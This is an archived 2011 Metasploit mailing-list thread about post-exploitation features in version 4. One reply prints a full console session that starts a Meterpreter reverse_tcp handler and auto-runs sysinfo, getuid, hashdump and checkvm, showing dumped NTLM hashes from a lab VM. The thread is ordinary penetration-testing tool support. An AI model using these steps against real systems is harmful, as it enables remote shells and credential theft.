Re: News from Metasploit 4.

[Richard Miles <richard.k.miles () googlemail com>]

Hi Carlos

Yes, but failed, what worked was run post/windows/manage/migrate, but
took a long time to finish (around 10 minutes). Very uncommon.

Also, at the end of migrate my meterpreter EXE is still on the list of
proccess. Once it was migrated it should not be dropped? If not, there
is a way to do it with migrate?

About the screenshot I tried use espia and screengrab, but it also
calls my lynx when it finish, which is very bad, because while I don't
hit "C" for cancel the rest of the script do not run. Any idea about
this?

Thanks Carlos


On Sat, Aug 27, 2011 at 3:37 PM, Carlos Perez
<carlos_perez () darkoperator com> wrote:
> Did you tried adding to the resource file
>
> Run migrate -f
>
> Cheers,
> Carlos Perez
>
> Sent from My Mobile Phone
>
> On Aug 27, 2011, at 3:15 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
>
> > Hi Carlos
> >
> > I followed your step by step and it worked, I'm really a foul. Thanks a lot.
> >
> > By the way do you know if there is reverse_http(s) for windows 64 bits?
> >
> > Thanks, really thanks.
> >
> > On Sat, Aug 27, 2011 at 1:50 PM, Carlos Perez
> > <dark0perator () pauldotcom com> wrote:
> > > works for me
> > > msf > use exploit/multi/handler
> > > msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
> > > PAYLOAD => windows/meterpreter/reverse_tcp
> > > msf  exploit(handler) > set LHOST 192.168.1.100
> > > LHOST => 192.168.1.100
> > > msf  exploit(handler) > set AutoRunScript multi_console_command -rc /tmp/sample.rc
> > > AutoRunScript => multi_console_command -rc /tmp/sample.rc
> > > msf  exploit(handler) > set ExitOnSession false
> > > ExitOnSession => false
> > > msf  exploit(handler) > exploit -x -j
> > > [*] Exploit running as background job.
> > >
> > > [*] Started reverse handler on 192.168.1.100:4444
> > > [*] Starting the payload handler...
> > > msf  exploit(handler) > cat /tmp/sample.rc
> > > [*] exec: cat /tmp/sample.rc
> > >
> > > sysinfo
> > > getuid
> > > load priv
> > > hashdump
> > > run checkvm
> > > msf  exploit(handler) >
> > > [*] Sending stage (752128 bytes) to 192.168.1.115
> > > [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.115:1543) at 2011-08-27 14:49:29 -0400
> > > [*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.115:1543) processing AutoRunScript 'multi_console_command -rc 
> > > /tmp/sample.rc'
> > > [*] Running Command List ...
> > > [*]     Running command sysinfo
> > > Computer        : CARLOS-192FCD91
> > > OS              : Windows XP (Build 2600, Service Pack 3).
> > > Architecture    : x86
> > > System Language : en_US
> > > Meterpreter     : x86/win32
> > > [*]     Running command getuid
> > > Server username: CARLOS-192FCD91\Administrator
> > > [*]     Running command load priv
> > > [-] The 'priv' extension has already been loaded.
> > > [*]     Running command hashdump
> > > Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
> > > Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
> > > HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
> > > HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
> > > SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
> > > [*]     Running command run checkvm
> > > [*] Checking if target is a Virtual Machine .....
> > > [*] This is a VMware Virtual Machine
> > >
> > > On Aug 26, 2011, at 4:16 PM, Richard Miles wrote:
> > >
> > > > Hi HD Moore,
> > > >
> > > > Thanks for links. Does the new reverse_http works in 64 bit Windows?
> > > > How should I call it?
> > > >
> > > > Any follow-up on the other 2 questions on the e-mail?
> > > >
> > > > Thanks
> > > >
> > > > On Fri, Aug 26, 2011 at 9:19 AM, HD Moore <hdm () metasploit com> wrote:
> > > > > The Metasploit blog includes quite a bit of information on 4.0:
> > > > >  https://community.rapid7.com/community/metasploit?view=blog
> > > > >
> > > > > You can also see the release notes:
> > > > >  https://community.rapid7.com/docs/DOC-1496
> > > > > _______________________________________________
> > > > > https://mail.metasploit.com/mailman/listinfo/framework
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework